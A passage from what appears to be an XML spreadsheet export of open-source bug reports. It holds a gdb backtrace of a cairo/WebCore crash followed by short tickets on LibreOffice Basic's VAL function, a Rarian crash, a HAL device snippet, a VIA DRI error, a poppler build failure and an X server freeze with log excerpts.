    0x7fff00000000 prev = 0x1e00000002 right = 0x7fff00000000 x = 0 top = 
    32767 dir = 0} top = 0 bottom = 0} {left = {next = 0x7fff3cdfc6d0 
              prev = 0x0 right = 0x800000001 x = -2013152344 top = 32717 
              dir = 22148672} right = {next = 0x0 prev = 0x8 right = 
    0x110000 x = 1021297456 top = 32767 dir = 371314105} top = 2 
            bottom = 32767} {left = {next = 0x3816215840 prev = 
    0x7fff3cdfca70 right = 0x7fff3cdfca70 x = 1021297184 top = 32767 
              dir = 27827648} right = {next = 0x1a89dc0 prev = 
    0x7fff3cdfc220 right = 0x7fff3cdfca70 x = -2013152344 top = 32717 
              dir = 22148672} top = 0 bottom = 0} {left = {next = 0x8 
              prev = 0x110000 right = 0x7fff3cdfc3b0 x = 371314105 top = 
    56 dir = 2} right = {next = 0x3816215840 prev = 0x0 right = 
    0x3ff0000000000000 x = 0 top = 0 dir = 0} top = 1 bottom = 3} {
            left = {next = 0x0 prev = 0x0 right = 0xffffffff x = 22148752 
              top = 0 dir = -2013154368} right = {next = 0x9 prev = 0x0 
              right = 0x7fcd880126e0 x = 22148672 top = 0 dir = 
    -2013190426} top = 0 bottom = 0} {left = {next = 0x2 prev = 
    0x38162153a2 right = 0x7fff00000002 x = 2 top = 10 dir = 
    -2013154362} right = {next = 0x7fff3cdfc330 prev = 0xffff00000030 
              right = 0x7fff3cdfc35c x = 32 top = 0 dir = -2013190428} 
            top = 22152736 bottom = 0} {left = {next = 0x19bbcf0 prev = 
    0x38ffffffff right = 0x380de751f1 x = -2013190426 top = 32717 dir = 
    15917952} right = {next = 0x1a2aab0 prev = 0x0 right = 0x7fff3cdfc3c4 
              x = 16681872 top = 0 dir = 15910512} top = 27435104 
            bottom = 0} {left = {next = 0x19bbcf0 prev = 0x381620eb06 
              right = 0x200000020 x = 1021297600 top = 32767 dir = 
    15917952} right = {next = 0x7fff3cdfd36c prev = 0x380000000f right = 
    0x380de751f1 x = -17 top = 0 dir = 15917952} top = 27185088 bottom = 
    0} {left = {next = 0x0 prev = 0x7fff3cdfc444 right = 0xfe8b90 x = 
    15910512 top = 0 dir = 27513184} right = {next = 0x1a5fa20 prev = 
    0x381620eb06 right = 0x200000000 x = 1021297728 top = 32767 dir = 
    15917952} top = 1021301740 bottom = 32767} {left = {next = 0xf prev = 
    0x0 right = 0x7fff3cdfc4f0 x = 350317990 top = 56 dir = 1021297788} 
            right = warning: can't find linker symbol for virtual table for `(null)' value
{next = 0x3810a4d26b prev = 0x0 right = 0xed7050 x = 
    0 top = 0 dir = 358870727} top = 0 bottom = 0} {left = {next = 
    0x1e00000002 prev = 0x0 right = 0x1a37a80 x = 1021298032 top = 32767 
              dir = 358870011} right = {next = 0x0 prev = 0x3815646dd5 
              right = 0x0 x = 0 top = 0 dir = 0} top = 350561120 
            bottom = 56} {left = {next = 0x0 prev = 0x1e00000002 right = 
    0x10000 x = 28299152 top = 0 dir = 1021298032} right = {next = 0x0 
              prev = 0x100 right = 0x0 x = 0 top = 0 dir = 358904108} 
            top = 30 bottom = 0} {left = {next = 0x0 prev = 0x1a37a80 
              right = 0x50000001e x = 29379705 top = 0 dir = 358919534} 
            right = {next = 0xffffff02 prev = 0x1e00000100 right = 
    0x42b8000000000000 x = 28299152 top = 0 dir = 0} top = 1021301216 
            bottom = 32767} {left = {next = 0x0 prev = 0x0 right = 
    0x1afcf90 x = 359046198 top = 56 dir = 0} right = {next = 0x0 prev = 
    0x0 right = 0xffffe70000000000 x = 0 top = 32767 dir = 0} top = 0 
            bottom = 32767} {left = {next = 0x7fff00000002 prev = 0x1e 
              right = 0x0 x = 0 top = 1076756480 dir = 358822900} right = 
    {next = 0x3ff0000000000000 prev = 0x7fff3cdfc6c0 right = 0x1 x = 254 
              top = 0 dir = 29379708} top = 29379705 bottom = 0} {left = {
              next = 0x3800000000 prev = 0x315632460 right = 
    0x9999730c44ab1fec x = 256 top = 30 dir = 1021298304} right = {next = 
    0x1a5efe0 prev = 0x1 right = 0x7fff3cdfc6f0 x = 1021303568 top = 
    32767 dir = 2} top = 0 bottom = 0}}
        rectangles = 
        stack_rectangles_ptrs = {0x7fff3cdfbf18 0x7fff3cdfbec0 0x0 
    0x7fff3cdfc6f0 0x7fff3cdfdaa0 0x381564a9d7 0x7fff3cdfd4c0 
    0x7fff3cdfdaa0 0xf00000018 0xf0000003b 0x300000000 0xfe00000000 0x0 
    0x38156533ed 0x50000000000 0x3fcffffe700 0x0 0x1e00000002 
    0x9999730c44ab1fec 0x0 0xffffe90000000000 0x190000000000 
    0xffffe900ffffd000 0x1900ffffd000}
        rectangles_ptrs = 0x7fff3cdfc6b0
        status = 
        i = 2
        __PRETTY_FUNCTION__ = 
    _cairo_bentley_ottmann_tessellate_rectangular_traps
#3  0x0000003815631c9b in _cairo_path_fixed_fill_rectilinear_to_traps (
    path= fill_rule=CAIRO_FILL_RULE_EVEN_ODD traps=
    0x7fff3cdfd440) at cairo-path-fill.c:391
        iter = {first = 0x1a3a490 buf = 0x1a3a490 n_op = 10 n_point = 8}
        box = {p1 = {x = -12288 y = -5888} p2 = {x = 0 y = 6400}}
        status = 
#4  0x0000003815631f5e in _cairo_path_fixed_fill_rectilinear_tessellate_to_region (path=0x1a3a468 fill_rule= extents=0x1a3a6b0)
    at cairo-path-fill.c:183
        box = {p1 = {x = 386766477 y = 56} p2 = {x = 21772064 y = 0}}
        status = 
        region = 
        polygon = {status = 6144 first_point = {x = 3840 y = 1021303184} 
          last_point = {x = 0 y = 0} current_point = {x = 0 y = 
    358953990} current_edge = {dx = 56 dy = 1021300880} 
          has_current_point = 32767 has_current_edge = 1021300864 extents = 
    {p1 = {x = 32767 y = 35328} p2 = {x = 3840 y = 35328}} limit = {p1 = {
              x = 7680 y = 21248} p2 = {x = 3840 y = 21248}} limits = 
    0xf0000008a00 num_limits = 35328 num_edges = 7680 edges_size = 21248 
          edges = 0x1e0000005300 edges_embedded = {{line = {p1 = {x = 
    -1717986918 y = 1069128089} p2 = {x = 1021301040 y = 32767}} top = 
    1021302176 bottom = 32767 dir = 1021302176} {line = {p1 = {x = 32767 
                  y = 361388632} p2 = {x = 56 y = 0}} top = 0 bottom = 
    27652064 dir = 0} {line = {p1 = {x = 358816959 y = 56} p2 = {x = 
    2147483647 y = -2147483648}} top = -2147483648 bottom = 6144 dir = 
    3840} {line = {p1 = {x = 21248 y = 1021303376} p2 = {x = 1 y = 0}} 
              top = 0 bottom = 0 dir = 0} {line = {p1 = {x = 21248 y = 
    3840} p2 = {x = 1021303408 y = 32767}} top = 361388632 bottom = 56 
              dir = 1021302176} {line = {p1 = {x = 32767 y = 1021302864} 
                p2 = {x = 32767 y = 2}} top = 0 bottom = 27652064 dir = 
    0} warning: can't find linker symbol for virtual table for `(null)' value
{line = warning: can't find linker symbol for virtual table for `(null)' value
{p1 = warning: can't find linker symbol for virtual table for `(null)' value
{x = 358920856 y = 56} p2 = {x = 1021303408 y = 
    32767}} top = 520 bottom = 0 dir = 0} {line = {p1 = {x = 0 y = 
    1021301168} p2 = {x = 32767 y = 1021303680}} top = 32767 bottom = 0 
              dir = 0} {line = {p1 = {x = -1717986918 y = 1069128089} p2 = 
    {x = 1021301376 y = 32767}} top = 0 bottom = 32767 dir = 16} {line = 
    {p1 = {x = 0 y = 16} p2 = {x = 0 y = 27288752}} top = 0 bottom = 
    27434912 dir = 0} warning: can't find linker symbol for virtual table for `(null)' value
{line = warning: can't find linker symbol for virtual table for `(null)' value
{p1 = warning: can't find linker symbol for virtual table for `(null)' value
{x = 0 y = 2147483647} p2 = {x = 
    2147483647 y = -2147483648}} top = -2147483648 bottom = 21248 dir = 
    3840} {line = {p1 = {x = 35328 y = 7680} p2 = {x = 0 y = 
    1021302864}} top = 32767 bottom = 1 dir = 0} {line = {p1 = {x = 32 
                  y = 0} p2 = {x = 1021301280 y = 32767}} top = 0 
              bottom = 0 dir = 258135159} {line = {p1 = {x = 56 y = 
    237014880} p2 = {x = 56 y = 6569216}} top = 0 bottom = 362891720 
              dir = 56} {line = {p1 = {x = 27288736 y = 0} p2 = {x = 
    16030080 y = 0}} top = 258105544 bottom = 56 dir = 8} {line = {p1 = {
                  x = 0 y = 3} p2 = {x = 0 y = 80}} top = 0 bottom = 
    258317857 dir = 56} {line = {p1 = {x = 32 y = 0} p2 = {x = 258317857 
                  y = 56}} top = 0 bottom = 0 dir = 14} {line = {p1 = {
                  x = 51 y = 176} p2 = {x = 0 y = 258317857}} top = 56 
              bottom = 1 dir = 0} {line = {p1 = {x = 236355200 y = 56} 
                p2 = {x = -1960568632 y = 32717}} top = 208 bottom = 0 
              dir = -1960565416} {line = {p1 = {x = 32717 y = 26755616} 
                p2 = {x = 0 y = 80}} top = 0 bottom = 274796513 dir = 
    56} {line = {p1 = {x = 0 y = 0} p2 = warning: can't find linker symbol for virtual table for `(null)' value
{x = 0 y = 0}} top = 0 
              bottom = 0 dir = 26755616} {line = {p1 = {x = 0 y = 
    27318512} p2 = {x = 0 y = 26759584}} top = 0 bottom = 2 dir = 0} {
              line = {p1 = {x = 274911557 y = 56} p2 = {x = 0 y = 0}} 
              top = 21945056 bottom = 0 dir = 27026848} {line = {p1 = {x = 
    0 y = 21945328} p2 = {x = 0 y = 1}} top = 0 bottom = 274911557 
              dir = 56} {line = {p1 = {x = 0 y = 0} p2 = {x = 27318512 
                  y = 0}} top = 2 bottom = 0 dir = 274789040} {line = {
                p1 = {x = 56 y = 16780192} p2 = {x = 0 y = 53}} top = 56 
              bottom = 27327136 dir = 0} warning: can't find linker symbol for virtual table for `(null)' value
{line = warning: can't find linker symbol for virtual table for `(null)' value
{p1 = warning: can't find linker symbol for virtual table for `(null)' value
{x = 0 y = 0} p2 = 
    {x = 0 y = 0}} top = 80 bottom = 0 dir = 0} {line = {p1 = {x = 0 
                  y = 0} p2 = {x = 0 y = 0}} top = 0 bottom = 3 dir = 
    48} {line = {p1 = {x = 91 y = 124} p2 = {x = 119 y = 110}} top = 0 
              bottom = 0 dir = 40} {line = {p1 = {x = 0 y = 40} p2 = {x = 
    0 y = 236355200}} top = 56 bottom = 45504 dir = 0} {line = {p1 = {
                  x = 29077056 y = 0} p2 = {x = 236355200 y = 56}} top = 
    233263601 bottom = 56 dir = 0} {line = {p1 = {x = 0 y = 40} p2 = {
                  x = 0 y = 1409310560}} top = 32717 bottom = 3 dir = 0}}}
        traps = {status = CAIRO_STATUS_SUCCESS limits = 0xf0 num_limits = 
    0 maybe_region = 1 has_intersections = 0 is_rectilinear = 0 
          is_rectangular = 0 num_traps = 0 traps_size = 16 traps = 
    0x7fff3cdfd468 traps_embedded = {{top = 0 bottom = 7680 left = {p1 = {
                  x = 0 y = 0} p2 = {x = 0 y = 7680}} right = {p1 = {x = 
    68608 y = 0} p2 = {x = 68608 y = 7680}}} {top = -5888 bottom = 6400 
              left = {p1 = {x = -12288 y = -5888} p2 = {x = -12288 y = 
    6400}} right = {p1 = {x = 0 y = -5888} p2 = {x = 0 y = 6400}}} {
              top = 258317857 bottom = 56 left = {p1 = {x = 0 y = 0} p2 = 
    {x = 1021302640 y = 32767}} right = {p1 = {x = 1 y = 13} p2 = {x = 1 
                  y = 16}}} warning: can't find linker symbol for virtual table for `(null)' value
{top = 1021301992 bottom = 32767 left = {p1 = {
                  x = 3840 y = 7680} p2 = {x = 6144 y = 3840}} right = {
                p1 = {x = 6144 y = 7680} p2 = {x = 21248 y = 3840}}} {
              top = 21248 bottom = 7680 left = {p1 = {x = 27763408 y = 0} 
                p2 = {x = 16700736 y = 0}} right = {p1 = {x = 15788304 y = 
    0} p2 = {x = 1021302336 y = 32767}}} {top = 16700736 bottom = 0 
              left = {p1 = {x = 16683592 y = 0} p2 = {x = 1021302529 y = 
    32767}} right = {p1 = {x = 274784457 y = 56} p2 = {x = 15444160 y = 
    0}}} {top = 371242113 bottom = 56 left = {p1 = {x = 24 y = 0} p2 = {
                  x = 27435136 y = 0}} right = warning: can't find linker symbol for virtual table for `(null)' value
{p1 = warning: can't find linker symbol for virtual table for `(null)' value
{x = 27435136 y = 0} 
                p2 = {x = 258321201 y = 0}}} {top = 28126096 bottom = 0 
              left = {p1 = {x = 354544562 y = 56} p2 = {x = 21772272 y = 
    0}} right = {p1 = {x = 27026848 y = 0} p2 = {x = 0 y = 0}}} {top = 
    1021302864 bottom = 32767 left = {p1 = {x = 1 y = 13} p2 = {x = 1 
                  y = 16}} right = {p1 = {x = 1021302216 y = 32767} p2 = {
                  x = 3840 y = 7680}}} {top = 21248 bottom = 3840 left = {
                p1 = {x = 21248 y = 7680} p2 = {x = 35328 y = 3840}} 
              right = {p1 = {x = 35328 y = 7680} p2 = {x = 0 y = 
    -12288}}} {top = 0 bottom = 15360 left = {p1 = {x = 0 y = 0} p2 = {
                  x = 0 y = 0}} right = {p1 = {x = 27597088 y = 0} p2 = {
                  x = 1 y = 0}}} {top = 1021302632 bottom = 32767 left = {
                p1 = {x = 1 y = 0} p2 = {x = 21772064 y = 0}} right = {
                p1 = {x = 16426176 y = 0} p2 = {x = 0 y = 0}}} {top = 
    274865027 bottom = 56 left = {p1 = {x = 24 y = 48} p2 = {x = 
    1021302576 y = 32767}} right = {p1 = {x = 1021302384 y = 32767} p2 = {
                  x = 16 y = 0}}} warning: can't find linker symbol for virtual table for `(null)' value
{top = 16 bottom = 0 left = {p1 = {x = 
    274814392 y = 0} p2 = {x = 1275091040 y = 32717}} right = {p1 = {x = 
    16426176 y = 0} p2 = {x = 260934024 y = 56}}} {top = 31529 bottom = 
    0 left = {p1 = {x = 6569216 y = 0} p2 = {x = 0 y = 0}} right = {p1 = 
    {x = 1275091040 y = 32717} p2 = {x = 0 y = 0}}} {top = 0 bottom = 0 
              left = warning: can't find linker symbol for virtual table for `(null)' value
{p1 = warning: can't find linker symbol for virtual table for `(null)' value
{x = 258342297 y = 56} p2 = {x = 1275076064 y = 
    32717}} right = {p1 = {x = 258135159 y = 56} p2 = {x = 237014880 y = 
    56}}}}}
#5  _cairo_path_fixed_fill_rectilinear_to_region (path=0x1a3a468 
    fill_rule= extents=0x1a3a6b0)
    at cairo-path-fill.c:342
        rectangle_stack = {{x = 0 y = 0 width = 0 height = 0} {x = 0 y = 
    32767 width = 0 height = 56} {x = 2 y = 32767 width = 30 height = 
    32767} {x = 0 y = 0 width = 12 height = 0} {x = 0 y = 0 width = 0 
            height = 0} {x = 0 y = 0 width = 1021300768 height = 0} {x = 
    1021298944 y = 32767 width = 1021300224 height = 32767} {x = 0 y = 
    0 width = 27490944 height = 0} warning: can't find linker symbol for virtual table for `(null)' value
{x = 359170560 y = 56 width = 
    358899127 height = 56} {x = 0 y = 1077805056 width = 358845023 
            height = 56} {x = -1073741824 y = 1096810495 width = 0 
            height = 0} {x = 0 y = 1073741824 width = 0 height = 0} {x = 
    0 y = 1072693248 width = 0 height = 0} {x = 0 y = 0 width = 0 
            height = 1072693248} {x = 0 y = -1066418176 width = 0 
            height = -2147483648} {x = 0 y = 0 width = 358730287 height = 
    56} {x = 0 y = 1077805056 width = 0 height = 1073741824} {x = 0 y = 
    0 width = 0 height = -1066418176} {x = 0 y = 0 width = 0 height = 
    0} {x = 3 y = 0 width = 1021300992 height = 32767} {x = 1021299168 
            y = 32767 width = 1021300448 height = 32767} {x = 3 y = 0 
            width = 28299152 height = 0} {x = 1021301216 y = 32767 
            width = 358923244 height = 56} {x = 1021300992 y = 32767 
            width = 0 height = 0} {x = 0 y = 32767 width = 0 height = 
    0} {x = 0 y = 0 width = 48 height = 0} {x = 0 y = 13 width = 1 
            height = 16} {x = 1021299208 y = 32767 width = 0 height = 
    7680} {x = 0 y = 0 width = 0 height = 7680} {x = 512 y = 0 width = 
    512 height = 7680} {x = 1021301696 y = 32767 width = 1021299312 
            height = 32767} {x = 1021299312 y = 32767 width = 1021304352 
            height = 32767} {x = 0 y = 0 width = 236355200 height = 56} {
            x = 1021299456 y = 32767 width = 32 height = 0} {x = 
    1021303936 y = 32767 width = 28076640 height = 0} {x = 1021303232 
            y = 32767 width = 233264486 height = 56} {x = 27502256 y = 0 
            width = 1021299456 height = 32767} {x = 1021299456 y = 32767 
            width = 358871462 height = 56} {x = 0 y = 32767 width = 
    27502256 height = 0} {x = 27501672 y = 0 width = 358818264 height = 
    56} {x = 0 y = 1293 width = 1 height = 16} {x = 1021299432 y = 
    32767 width = 0 height = 0} {x = 0 y = 0 width = 80 height = 0} {
            x = 24 y = 15 width = 59 height = 15} {x = 0 y = 0 width = 
    3 height = 48} {x = 91 y = 124 width = 119 height = 110} {x = 
    1021299512 y = 32767 width = 236355200 height = 56} {x = 1021299680 
            y = 32767 width = 32 height = 0} {x = 1021304160 y = 32767 
            width = 28076640 height = 0} {x = 1021303456 y = 32767 
            width = 233264486 height = 56} {x = 27502256 y = 0 width = 
    1021299680 height = 32767} {x = 1021299680 y = 32767 width = 
    358871462 height = 56} {x = 1021301144 y = 32767 width = 27502256 
            height = 0} {x = 27501672 y = 0 width = 358818264 height = 
    56} {x = 0 y = 0 width = 29379693 height = 0} {x = 29379692 y = 0 
            width = 0 height = 0} {x = 1021300944 y = 32767 width = 0 
            height = 0} {x = 83 y = 15 width = 147 height = 15} {x = 0 
            y = 0 width = 358850733 height = 56} {x = 1021300252 y = 
    32767 width = 1021300248 height = 32767} {x = 1021301144 y = 32767 
            width = 22177904 height = 0} {x = 27652064 y = 0 width = 
    28299152 height = 0} {x = 27652064 y = 0 width = 1021301368 height = 
    32767} {x = 0 y = 0 width = 0 height = 0} {x = 0 y = 0 width = 
    358911848 height = 56} {x = 1021300476 y = 32767 width = 1021300472 
            height = 32767} {x = 1021301368 y = 32767 width = 361394912 
            height = 56} {x = 27652064 y = 0 width = 0 height = 0} {x = 
    1021300160 y = 32767 width = 28299152 height = 0} {x = 48 y = 0 
            width = 258317857 height = 56} {x = 1529 y = 0 width = 
    16700496 height = 0} {x = 1529 y = 0 width = 16700496 height = 0} {
            x = 1610631552 y = 32717 width = 258106718 height = 56} {x = 
    16683521 y = 0 width = 354500285 height = 56} {x = 1 y = 0 width = 
    371234211 height = 56} {x = 1610631360 y = 32717 width = 16700736 
            height = 0} {x = 15788304 y = 0 width = 1021300272 height = 
    32767} {x = 16700736 y = 0 width = 16683592 height = 0} {x = 
    16683521 y = 0 width = 274784405 height = 56} {x = 15444160 y = 0 
            width = 371242113 height = 56} {x = 48 y = 0 width = 
    258317857 height = 56} {x = 1529 y = 0 width = 16700496 height = 0} 
    {x = 1529 y = 0 width = 16700496 height = 0} {x = 1610631552 y = 
    32717 width = 236355200 height = 56} {x = 15788304 y = 0 width = 
    354500285 height = 56} {x = 1610631552 y = 32717 width = 371234211 
            height = 56} {x = 1744851808 y = 32717 width = 16700736 
            height = 0} {x = 15788304 y = 0 width = 1021300448 height = 
    32767} {x = 16700736 y = 0 width = 333544977 height = 56} {x = 1 
            y = 0 width = 21896208 height = 0} {x = 1 y = 0 width = 0 
            height = 0} {x = 0 y = 0 width = 333547977 height = 56} {x = 
    1 y = 0 width = 371233898 height = 56} {x = 15814656 y = 0 width = 
    258135159 height = 56} {x = 1021300336 y = 32767 width = 21897776 
            height = 0} {x = 15788304 y = 0 width = 21881248 height = 0} 
    {x = 0 y = 0 width = 371233318 height = 56} {x = 0 y = 1072693248 
            width = 0 height = 0} {x = 22054880 y = 0 width = 0 height = 
    56} {x = 0 y = 1079508992 width = 26883376 height = 0} {x = 16 y = 
    0 width = 16683592 height = 0} {x = 1409290768 y = 32717 width = 
    354531299 height = 56} {x = 16628096 y = 0 width = 371233453 
            height = 56} {x = 15910976 y = 0 width = 354530787 height = 
    56} {x = 16796288 y = 0 width = 3 height = 0} {x = 16624224 y = 0 
            width = 354532770 height = 56} {x = 16624224 y = 0 width = 
    1021301952 height = 32767} {x = 0 y = 0 width = 2 height = 0} {x = 
    27652064 y = 0 width = 358918943 height = 56} {x = 9679 y = 0 
            width = 1021300744 height = 32767} {x = 1021300736 y = 32767 
            width = 354522601 height = 56} {x = 1021301000 y = 32767 
            width = 1543 height = 0} {x = 16683592 y = 0 width = 9679 
            height = 0} {x = 1409290768 y = 32717 width = 0 height = 0} {
            x = 32 y = 0 width = 258317857 height = 0} {x = 0 y = 0 
            width = 358953990 height = 56} {x = 1021300656 y = 32767 
            width = 1021300640 height = 32767} {x = 21248 y = 3840 
            width = 21248 height = 7680} {x = 6144 y = 3840 width = 6144 
            height = 7680} {x = 21248 y = 3840 width = 21248 height = 
    7680} {x = 6144 y = 3840 width = 1021302176 height = 32767} {x = 0 
            y = 0 width = 2 height = 0} {x = 27652064 y = 0 width = 
    358918943 height = 56} warning: can't find linker symbol for virtual table for `(null)' value
{x = 361388632 y = 56 width = 0 height = 0} {
            x = 27652064 y = 0 width = 358816959 height = 56} {x = 80 
            y = 0 width = 21 height = 0} {x = 2 y = 0 width = 
    1021303152 height = 1} {x = 0 y = 0 width = 0 height = 0}}
        box = {p1 = {x = 21772080 y = 0} p2 = {x = 0 y = 0}}
        region = 
        __PRETTY_FUNCTION__ = _cairo_path_fixed_fill_rectilinear_to_region
#6  0x000000381561b584 in _cairo_clip_path_to_region (clip_path=0x1a3a460)
    at cairo-clip.c:639
        status = 
        prev = 0x1a2aa80
        __PRETTY_FUNCTION__ = _cairo_clip_path_to_region
#7  0x000000381561b63d in _cairo_clip_get_region (clip=0x1ac6b08 region=0x0)
    at cairo-clip.c:1295
        status = 
        __PRETTY_FUNCTION__ = _cairo_clip_get_region
#8  0x00000038156204a0 in _clipped (gstate=0x1ac6a60) at cairo-gstate.c:986
        extents = {x = 0 y = 0 width = 268 height = 30}
#9  0x0000003815621223 in _cairo_gstate_fill (gstate=0x1ac6a60 path=
    0x38158a5a58) at cairo-gstate.c:1229
        clip = warning: can't find linker symbol for virtual table for `(null)' value
{path = 0x38158a5a58 all_clipped = 1021303392}
        status = CAIRO_STATUS_SUCCESS
#10 0x000000381561886d in cairo_fill_preserve (cr=0x38158a5740)
    at cairo.c:2277
        status = 
#11 0x0000003815618899 in cairo_fill (cr=0x7fff3cdfbd70) at cairo.c:2253
No locals.
#12 0x00000031999808eb in fillRectSourceOver (this= 
    rect=... color=... colorSpace=)
    at WebCore/platform/graphics/cairo/GraphicsContextCairo.cpp:118
No locals.
#13 WebCore::GraphicsContext::fillRect (this= rect=... 
    color=... colorSpace=)
    at WebCore/platform/graphics/cairo/GraphicsContextCairo.cpp:582
No locals.
#14 0x0000003199760be2 in WebCore::RenderBlock::fillRightSelectionGap (
    this= selObj=0x7fcd7c1d6230 xPos=1021296408 
    yPos= height=15 rootBlock=0x7fcd7c1d4628 blockX=
    8 tx=75 ty=139 paintInfo=0x7fff3cdfe820)
    at WebCore/rendering/RenderBlock.cpp:2219
        left = 274
        width = 
        gapRect = {m_location = {m_x = 274 m_y = 139} m_size = {m_width = 
    50 m_height = 15}}
#15 0x00000031997f6602 in WebCore::RootInlineBox::fillLineSelectionGap (this=
    0x7fcd7c172d80 selTop=0 selHeight=15 rootBlock= 
    blockX= blockY=8 tx=75 ty=139 paintInfo=
    0x7fff3cdfe820) at WebCore/rendering/RootInlineBox.cpp:255
        lineState = 
        leftGap = false
        rightGap = true
        lastBox = 0x7fcd7c172ed0
        firstBox = 0x7fcd7c172ed0
        result = {m_left = {m_location = {m_x = 0 m_y = 0} m_size = {
              m_width = 0 m_height = 0}} m_center = {m_location = {m_x = 0 
              m_y = 0} m_size = {m_width = 0 m_height = 0}} m_right = {
            m_location = {m_x = 0 m_y = 0} m_size = {m_width = 0 
              m_height = 0}}}
#16 0x0000003199761137 in WebCore::RenderBlock::fillInlineSelectionGaps (
    this= rootBlock= 
    blockX= blockY= 
    tx= ty=139 lastTop=@0x7fff3cdfe6ec lastLeft=
    @0x7fff3cdfe6e8 lastRight=@0x7fff3cdfe6e4 paintInfo=0x7fff3cdfe820)
    at WebCore/rendering/RenderBlock.cpp:2080
        selTop = 0
        selHeight = 1021296408
        containsStart = true
        lastSelectedLine = 
        curr = 0x7fcd7c172d80
        result = {m_left = {m_location = {m_x = 0 m_y = 0} m_size = {
              m_width = 0 m_height = 0}} m_center = {m_location = {m_x = 0 
              m_y = 0} m_size = {m_width = 0 m_height = 0}} m_right = {
            m_location = {m_x = 0 m_y = 0} m_size = {m_width = 0 
              m_height = 0}}}
#17 0x0000003199761bc0 in WebCore:</t>
  </si>
  <si>
    <t>LIBREOFFICE-44172</t>
  </si>
  <si>
    <t>Basic function VAL produces bad result</t>
  </si>
  <si>
    <t>Created attachment 54839
This file contains a basic macro showing the bug when executed.
The basic function Val as not more a correct behavior 
   code                 display
msgbox(Val(1.23))      1.231
msgbox(Val(1.11))      1.111
msgbox(Val(11))        1111
msgbox(Val(1.2))       1.21
msgbox(Val(1))         11
Tested on LOdev3.5.0 Beta2 Kubuntu 11.04
and on LOdev3.5.0 Beta0 Windows XP</t>
  </si>
  <si>
    <t>augsod</t>
  </si>
  <si>
    <t>gngonlo</t>
  </si>
  <si>
    <t>RARIAN-12131</t>
  </si>
  <si>
    <t>Crash on EOF in rrn_reg_parse_file ()</t>
  </si>
  <si>
    <t>Rarian 0.5.6 has a bug that causes a crash in some situations when reaching the EOF of a .document file. Attaching a patch.</t>
  </si>
  <si>
    <t>HAL-11221</t>
  </si>
  <si>
    <t>Please add FDI snippet for Sony Ericsson K610i as portable music player</t>
  </si>
  <si>
    <t>Here's a patch to my /usr/share/hal/fdi/information/10freedesktop/10-usb-music-players.fdi file so that the Sony Ericsson K610i phone is recognised as a USB portable music player when it's switched to USB/MemoryStick mode.
Hope this helps.
Best regards</t>
  </si>
  <si>
    <t>oberger</t>
  </si>
  <si>
    <t>DRI-2118</t>
  </si>
  <si>
    <t>via: Invalid DMA header command.</t>
  </si>
  <si>
    <t>For some applications The following message from the VIA command verifier appears:
*ERROR* Invalid / Unimplemented DMA HEADER command. 0x0
Which suggests either a bug in the verifier or in the Mesa driver. 
I'm entering this for reference and will try to track it down as soon as possible. 
/Thomas</t>
  </si>
  <si>
    <t>POPPLER-26351</t>
  </si>
  <si>
    <t>Build failure in upgrade to poppler-0.13.0</t>
  </si>
  <si>
    <t>I just tried upgrading from 0.12.2 to 0.13.3 on a slackware 12.2 box in a garnome 2.29.6 build environment.  The build dies with:
  CXXLD  pdffonts
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_destroy_compress(jpeg_compress_struct*)'
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_start_compress(jpeg_compress_struct* int)'
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_stdio_dest(jpeg_compress_struct* _IO_FILE*)'
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_finish_compress(jpeg_compress_struct*)'
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_std_error(jpeg_error_mgr*)'
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_write_scanlines(jpeg_compress_struct* unsigned char** unsigned int)'
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_set_defaults(jpeg_compress_struct*)'
../poppler/.libs/libpoppler.so: undefined reference to `jpeg_CreateCompress(jpeg_compress_struct* int unsigned int)'
collect2: ld returned 1 exit status
Configure correctly figures out that I have a plain libjpeg and the library seems to have the missing symbols defined.  My bet is that that -ljpeg was omitted form the ld command.</t>
  </si>
  <si>
    <t>XORG-7031</t>
  </si>
  <si>
    <t>X server freezes after login attempt</t>
  </si>
  <si>
    <t>Alter try  to login the X server locks cpu goes to 100% hagns  keyboard no 
mouse. I have to login via ssh to kill the X server or reboot.
Disabling DRI and GLX X server doesn't freezes and works fine.
I'm using a FC5 on a PPC machine (iMac)
parts of /var/log/messages:
...
May  9 10:42:12 localhost kernel: Linux agpgart interface v0.101 (c) Dave Jones
May  9 10:42:12 localhost kernel: agpgart: Detected Apple UniNorth/Pangea 
chipset
May  9 10:42:12 localhost kernel: agpgart: configuring for size idx: 4
May  9 10:42:12 localhost kernel: agpgart: AGP aperture is 16M @ 0x0
...
May  9 10:42:46 localhost kernel: agpgart: Couldn't find an AGP VGA controller.
May  9 10:42:46 localhost kernel: agpgart: Putting AGP V2 device at 
0000:00:0b.0 into 0x mode
May  9 10:42:46 localhost kernel: agpgart: Putting AGP V2 device at 
0000:00:10.0 into 0x mode
parts of /var/log/Xorg.0.log:
...
(II) PCI: PCI scan (all values are in hex)
(II) PCI: 00:0b:0: chip 106b0027 card 00000000 rev 00 class 060000 hdr 00
(II) PCI: 00:10:0: chip 10025452 card 10025452 rev 00 class 038000 hdr 00
(II) PCI: 10:0b:0: chip 106b0028 card 00000000 rev 00 class 060000 hdr 00
(II) PCI: 10:17:0: chip 106b0025 card 00000000 rev 00 class ff0000 hdr 00
(II) PCI: 10:18:0: chip 106b0026 card 00000000 rev 00 class 0c0310 hdr 00
(II) PCI: 10:19:0: chip 106b0026 card 00000000 rev 00 class 0c0310 hdr 00
(II) PCI: 20:0b:0: chip 106b0029 card 00000000 rev 00 class 060000 hdr 00
(II) PCI: 20:0e:0: chip 106b0030 card 106b0030 rev 00 class 0c0010 hdr 00
(II) PCI: 20:0f:0: chip 106b0024 card 00000000 rev 00 class 020000 hdr 00
(II) PCI: End of PCI scan
(II) Host-to-PCI bridge:
(II) Bus 0: bridge is at (0:11:0) (0032) BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 0 I/O range:
        [0] -1  0       0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) Bus 0 non-prefetchable memory range:
        [0] -1  0       0x00000000 - 0xffffffff (0x0) MX[B]
(II) Bus 0 prefetchable memory range:
        [0] -1  0       0x00000000 - 0xffffffff (0x0) MX[B]
(II) Host-to-PCI bridge:
(II) Bus 16: bridge is at (16:11:0) (161632) BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 16 I/O range:
